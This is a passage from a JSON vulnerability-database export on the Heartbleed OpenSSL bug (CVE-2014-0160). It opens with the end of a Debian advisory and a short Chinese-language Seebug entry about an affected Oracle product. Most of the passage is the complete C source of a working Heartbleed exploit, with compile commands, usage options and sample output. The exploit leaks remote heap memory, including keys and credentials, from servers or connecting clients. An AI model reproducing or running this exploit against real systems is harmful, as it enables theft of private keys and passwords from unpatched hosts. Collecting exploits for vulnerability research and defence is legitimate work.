has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2014-04-07T21:37:07", "published": "2014-04-07T21:37:07", "id": "DEBIAN:DSA-2896-1:7AEC1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00071.html", "title": "[SECURITY] [DSA 2896-1] openssl security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "seebug": [{"lastseen": "2017-11-19T17:26:43", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "modified": "2014-04-21T00:00:00", "published": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:03:33", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86061", "id": "SSV:86061", "title": "Heartbleed OpenSSL - Information Leak Exploit (1)", "type": "seebug", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65535 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 0){\r\n\t\t\t\t\tiprecmd = 1;\r\n\t\t\t\t\tprecmd = atoi(optarg);\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\tloop = 1;\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif(ihost==0||iport==0||ifile==0||itype==0||type < 0){\r\n\t\tprintf("[ try --help\\n");\r\n\t\texit(0);\r\n\t}\r\n\tssl_init();\r\n\tif(bind==0){\r\n\t\tret = tcp_connect(host, port);\r\n\t\tpre_cmd(ret, precmd, verbose);\r\n\t\tc = tls_connect(ret);\r\n\t\theartbleed(c,type);\r\n\t\twhile(repeat==1){\r\n\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t}\r\n\t\twhile(loop==1){\r\n\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\tfirst=0;\r\n\t\t\trepeat=1;\r\n\t\t\theartbleed(c,type);\r\n\t\t\twhile(repeat==1){\r\n\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t}\r\n\t\t}\r\n\t\tprintf("[ done.\\n");\r\n\t\texit(0);\r\n\t}\r\n\telse{\r\n\t\tint sd, pid, i;\r\n\t\tret = tcp_bind(host, port);\r\n\t\twhile(1){\r\n \t\t\tsd=accept(ret,0,0);\r\n\t\t\tif(sd==-1){\r\n\t\t\t\tprintf("[!] FATAL: problem with accept()\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t\tif(pid=fork()){\r\n\t\t\t\tclose(sd);\r\n\t\t\t}\r\n \t\t\telse{\r\n\t\t\t\tc = tls_bind(sd);\r\n\t\t\t\tpre_cmd(ret, precmd, verbose);\r\n\t\t\t\theartbleed(c,type);\r\n\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t}\r\n\t\t\t\twhile(loop==1){\r\n\t\t\t\t\tprintf("[ entered heartbleed loop\\n");\r\n\t\t\t\t\tfirst=0;\r\n\t\t\t\t\trepeat=0;\r\n\t\t\t\t\theartbleed(c,type);\r\n\t\t\t\t\twhile(repeat==1){\r\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\tprintf("[ done.\\n");\r\n\t\t\t\texit(0);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-86061"}, {"lastseen": "2017-11-19T17:28:38", "bulletinFamily": "exploit", "description": "CVE 